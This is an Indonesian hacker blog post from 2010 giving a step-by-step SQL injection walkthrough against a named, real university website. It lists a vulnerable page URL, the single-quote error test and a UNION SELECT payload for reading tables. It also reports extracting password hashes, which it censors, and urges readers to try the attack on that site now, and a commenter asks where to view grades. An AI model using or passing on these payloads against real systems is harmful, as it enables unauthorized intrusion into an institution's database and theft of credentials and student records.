unmer.ac.id SQL injection


Written on June 25, 2010 – 09:04 | by dikz_n0ise
http://www.dikz.web.id/wp-content/plugins/sociofluid/images/digg_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/reddit_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/dzone_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/stumbleupon_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/delicious_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/blinklist_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/blogmarks_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/furl_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/newsvine_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/technorati_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/magnolia_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/google_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/myspace_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/facebook_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/yahoobuzz_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/sphinn_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/mixx_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/twitter_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/jamespot_32.png http://www.dikz.web.id/wp-content/plugins/sociofluid/images/meneame_32.png

Malam guys, lama gak maen sama yg beginian ternyata kangen juga sama SQL injection, ternyata masih bnyak banget situs2 yang vulnerable dengan teknik ini terutana situs2 Perguruan Tinggi & Pemerintah, kemaren iseng2 nyari sasaran ternyata dapet situsnya unmer.ac.id makanya saya kasih judul nya unmer.ac.id Sql injection. oke langsung ja review sedikit y :04: ,,

- pertama buka situsnya unmer.ac.id

- cari link link yang familier dengan SQL Injection seperti ini contohnya

http://www.unmer.ac.id/pages.php?langid=1&menuid=4&pageid=77

- lalu tambahkan tanda kutip di URL paling belakang (dibelakang angka terakhir). seperti ini

http://www.unmer.ac.id/pages.php?langid=1&menuid=4&pageid=77′ .

Disitu anda akan melihat keterangan error karena tidak ada filter untuk memblok sebuah karakter selain integer. perlu bukti :04: ,,??? ok lihat gambar dibawah ini

- klo udh gitu saatnya kita membaca tabel :04: ,, cara nya ky gini

http://www.unmer.ac.id/pages.php?langid=1&menuid=4&pageid=-77+union+select+1,2,3,4,5,6–

lalu temen2 bakal di beri nilai dari unmer meski bukan mahasiswa unmer :18: ,, (muncul gambar kaya gini).

hmm, berhubung udah malem dan saya juga udh ngantuk tutorial yang sama bisa dibaca dihalaman ini http://www.dikz.web.id/2010/04/sql-injection/

temen2 pengen tau result akhirnya ,..???? oke dh ini dia :04: ,,

sorry saya sensor y hash nya, biar g terlalu vulgar :04: ,,

silakan coba praktekin sekarang pada situs unmer.ac.id, moga ja masih bisa :04: ,, oke sekian dari saya, good night & thanx,, CU

Popularity: 7% [?]

  • Share/Bookmark

Tags: , ,

  1. One Response to “unmer.ac.id SQL injection”

  2. By udin on Aug 30, 2010 | Reply

    saya uada masuk thap 2>>>> nah nilaiNya diliat dmana???

Post a Comment